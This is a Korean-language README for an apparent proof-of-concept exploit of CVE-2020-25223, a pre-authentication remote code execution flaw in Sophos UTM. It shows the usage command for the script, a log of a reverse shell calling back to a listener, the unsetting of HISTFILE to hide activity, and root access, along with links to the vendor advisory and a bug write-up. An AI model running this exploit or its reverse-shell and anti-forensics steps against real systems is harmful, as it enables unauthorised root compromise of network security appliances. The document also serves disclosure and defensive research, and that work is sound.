
CVE-2020-25223
CVE-2020-25223 RCE PoC, 역방향 셸 획득. 사전 인증 없음. 일부 위협 요소를 통합하기 위해 급히 구현했습니다.
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) 포트 80에서 핸들러 시작
(+) 콜백을 x.x.x.x:80으로 전송
(+) x.x.x.x에서 연결됨
(+) 셸 획득!
bash: 이 셸에서는 작업 제어 불가
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** 원격 호스트에 의해 연결 종료 ***
#
여기서는 구현되지 않았습니다. nuclei 템플릿을 사용하세요.
이들은 파이썬 인터프리터를 가지고 있으며, 실제로 매우 완벽한 기능의 리눅스 환경을 사용할 수 있습니다. 사후 침투를 위한 놀라운 잠재력이 있습니다.
관심 있는 누군가가 이 부분을 채울 것이라고 확신합니다. Bitter("블루 팀 트위터"의 하위 집합)가 아마 곧 그렇게 할 것입니다. 즉, 암호화되지 않은 역방향 셸이 Unified Threat Manager 상자에서 신호를 보내는 것을 탐지하는 것이 그렇게 어렵지 않을 것입니다, 그렇죠?
(아마도 Sophos에서 온) 누군가가 이 공식 수정 링크를 보내왔습니다. UTM을 업데이트하세요. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
타사 참고 자료 (버그 세부 정보): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
Sophos에 직접 불만을 제기하세요. 21세기에 사용자 입력을 Perl의 open()에 전달하는 것이 좋은 생각이라고 생각한 것은 이해하기 어렵습니다.